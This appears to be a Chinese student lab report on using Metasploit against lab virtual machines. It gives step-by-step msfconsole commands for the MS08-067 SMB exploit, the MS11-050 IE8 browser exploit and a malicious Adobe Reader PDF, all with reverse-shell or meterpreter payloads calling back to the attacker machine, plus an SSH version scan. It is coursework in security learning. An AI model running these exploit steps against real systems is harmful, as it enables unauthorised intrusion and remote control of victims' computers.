实验五 MSF基础应用

实验内容

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1.一个主动攻击实践,ms08_067(成功)

    2. 一个针对浏览器的攻击,ms11_050(成功)

    3. 一个针对客户端的攻击,Adobe(成功)

    4. 成功应用任何一个辅助模块,scanner/ssh/ssh_version,(成功,唯一)

基础问题

用自己的话解释什么是exploit,payload,encode:

  • Exploit:exploit 的英文意思为利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用),有Exploit就肯定有漏洞。我自己的理解是一种攻击模块。
  • Payload:字面意思 “有效载荷,有效负荷,有效载重”。对于程序员来说就是在程序中起关键作用的代码。
  • Encode:对payload进行一定程度的编码,从而使之达到免杀的程度

实验步骤

查看各端的 IP地址:

攻击机Kali: 192.168.10.138

靶机Win7: 192.168.10.137

靶机WinXP:  192.168.10.139

靶机Win2k: 192.168.10.140

(一)一个主动攻击实践

Windows服务渗透攻击——MS08-067安全漏洞

ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,甚至一些vista的系统都会有这个远程溢出的漏洞。

  • 输入 msfconsole 进入控制台

  • 输入 search ms08_067 进行搜索漏洞

  • 复制所在位置并使用, use exploit/windows/smb/ms08_067_netapi

  • 输入 show options 可以查看当前配置

  • 依次输入以下指令,进行配置
# show payloads
# set payload generic/shell_reverse_tcp //tcp反向回连
# set LHOST 192.168.10.138 //设置攻击机IP
# set LPORT //攻击端口
# set RHOST 192.168.10.137 //设置靶机IP
# set target //自动选择目标系统类型,匹配度较高
# exploit //探测并攻击

  • 输入 exploit 进行监听

  • 好的,渗透失败,看来Win7已经打过补丁了。输入info 并查看,就会发现,果然Available targets不包含Win7...
  • 接下来试试WinXP

出现如下情况: Exploit completed, but no session was created.

通过查找资料,得知导致该情况的原因可能有:

1. 被攻击机器的防火墙打开了。

2. 不满足漏洞触发条件;目标系统不受此漏洞影响。

3. 过程有遗漏或错误(payload、set target)。

我在检查了网络连通状况、靶机系统版本、防火墙,Kali端的payload、set target之后,发现均无问题,所以暂时没有找出解决此问题的办法。

接下来试试Win2k吧。

  • 渗透成功,接下来便可进行攻击啦。

参考资料

(二)一个针对浏览器的攻击

ms11_050

靶机:Win7;浏览器:IE8

  • 输入 msfconsole 进入控制台
  • 输入 search ms11_050 ,搜索漏洞的相关信息

  • 输入 use exploit/windows/browser/ms11_050_mshtml_cobjectelement ,使用该漏洞
  • 依次输入如下指令
# set payload windows/meterpreter/reverse_tcp //选择载荷
# set LHOST 192.168.10.138 //设置攻击机IP
# set LPORT
# set RHOST 192.168.10.137 //设置靶机IP
# exploit

  • 将生成的网址输入Win7的IE8中

  • kali自动回连,渗透成功。

(三)一个针对客户端的攻击

Adobe PDF阅读器

靶机:Win7

  • 输入 msfconsole 进入控制台
  • 输入 search adobe 搜索漏洞的相关信息

  • 在经过不断地尝试和寻找之后,成功了找到了如下漏洞
  • 输入use windows/fileformat/adobe_reader_u3d
  • 依次输入以下指令:
# info //查看漏洞具体信息
# set payload windows/meterpreter/reverse_tcp //选择攻击载荷
# set LHOST 192.168.10.138 //攻击机IP
# set LPORT //设置端口号
# set FILENAME .pdf //设置文件名
# show options //查看设置
# exploit

  • 生成PDF文件 .pdf

  • 在win7的靶机中打开.pdf
  • 在攻击机中进行攻击,即可获得win7机的权限

(四)成功应用任何一个辅助模块

靶机:Win7 192.168.10.137

模块:scanner/ssh/ssh_version

  • 在msfconsole中通过命令 show auxiliary 查看所有的辅助模块

  • 输入 info 查看这个模块的作用,可见其用于扫描ssh的服务版本

  • 设置其所需要的参数并进行攻击

  • 成功地进行了扫描

实验中遇到的问题

  • 在做第一个主动攻击实践时就遇到了问题,具体问题及解决步骤我在前面贴出来了。
  • 在做adobe那部分的实验过程中,我运用命令生成了 .pdf ,可是一直都找不到生成的文件存放在哪,主目录里找不到.msf4的文件夹,解决办法如下:

1. 先在“显示隐藏文件”处打钩,会发现 .pdf 位于(home/.mf4/local)

2. 使用 cd .msf4/local ,输入 ls 便可查看到 20165234.pdf ,使用命令 mv .pdf /home 将pdf移动到主目录便可以看见了 。

离实战还缺些什么技术或步骤

  • 信息收集扫描的重要性,掌握准确的信息是成功的关键因素。
  • msf只是攻击漏洞的一个工具,要想针对某个漏洞进行攻击,还是得参考网上搜索的资料和步骤。
  • 我现在只能依赖已有的攻击教程,根据想要的攻击的方法选择已有的模块进行攻击。所以想真正用好msf,还得多话费功夫去自行研究。

实验总结与体会

  • 我觉得本次实验逻辑较为清晰,总体来说实验过程还是比较顺利的。
  • 寻找靶机和选择漏洞的过程就花费了很大的力气,由此可见攻击漏洞的专一性,对操作系统和软件版本都有细致的要求。
  • 没有任何一个程序是十全十美的,所以在平时的使用过程中就要做到及时更新、注意打补丁。

2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础

    2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...

  2. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  3. 20155232《网络对抗》Exp5 MSF基础应用

    20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...

  4. 20155302《网络对抗》Exp5 MSF基础应用

    20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...

  5. 20155323刘威良《网络对抗》Exp5 MSF基础应用

    20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...

  6. 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用

    20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验  (首用) 渗透实验三:Adobe ...

  7. 20145215《网络对抗》Exp5 MSF基础应用

    20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...

  8. 20145208 蔡野 《网络对抗》Exp5 MSF基础应用

    20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...

  9. 20145311王亦徐 《网络对抗技术》 MSF基础应用

    20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...

  10. 20145325张梓靖 《网络对抗技术》 MSF基础应用

    20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...

随机推荐

  1. flutter-开发总结

    ### 上拉加载下拉刷新 ``` import 'dart:async'; import 'package:flutter_easyrefresh/easy_refresh.dart'; import ...

  2. Manifest merger failed : Attribute application@icon value=(@mipmap/ic_launcher) from AndroidManifest

    情况是这样子的,导入一个比较老的项目(两年前),它依赖于一个 Libraray,已经先导入了 library,现在导入项目的时候出了错 (1) Android Studio 目前提供将 SDK包成 . ...

  3. Python基础:搭建开发环境(1)

    1.Python语言简介 2.Python环境 Python环境产品存在多个. 2.1 CPython CPython是Python官方提供的.一般情况下提到的Python就是指CPython,CPy ...

  4. ThunderBird配置邮箱后无法发送邮件

    今天遇到的问题是在ThunderBird配置邮箱后无法发送邮件.用户名和密码都验证过去了.但一直无法发送邮件. 1.首先imap 和smtp 服务器都是通的. telnet imap.base-fx. ...

  5. servlet(2)servlet过滤器

    1.servlet过滤器 用于动态的拦截servlet请求或响应,以变更或使用其中的信息. (1)过滤器和servlet是多对多的关系,即一个过滤器可以用于一个或多个servlet,多个过滤器也可以用 ...

  6. ISOMAP和MDS降维

    转载自https://blog.csdn.net/victoriaw/article/details/78497316 核心:测地线距离(dijstra最短路径获得).MDS降维 Isomap(Iso ...

  7. Going from u to v or from v to u? POJ - 2762(强连通 有向最长路径)

    In order to make their sons brave, Jiajia and Wind take them to a big cave. The cave has n rooms, an ...

  8. MT【323】向量模的范围

    已知单位向量 $\overrightarrow e_1,\overrightarrow e_2$ 的夹角为 $120^\circ$,$\left|x\overrightarrow e_1+y\over ...

  9. 【C++】GSL(GNU Scientific Library) 的安装及在 Visual Studio 2017 中的使用

    GSL 是 GNU 开发并维护的科学计算的库,其中包括: 复数 多项式的根 特殊函数 向量和矩阵 排列 排序 BLAS支持 线性代数 Eigensystems 快速傅立叶变换 正交 随机数 准随机序列 ...

  10. Re.多项式除法/取模

    前言 emmm又是暂无 前置 多项式求逆 多项式除法/取模目的 还是跟之前一样顾名思义] 给定一个多项式F(x),请求出多项式Q(x)和R(x),满足F(x)=Q(x)∗G(x)+R(x),R项数小于 ...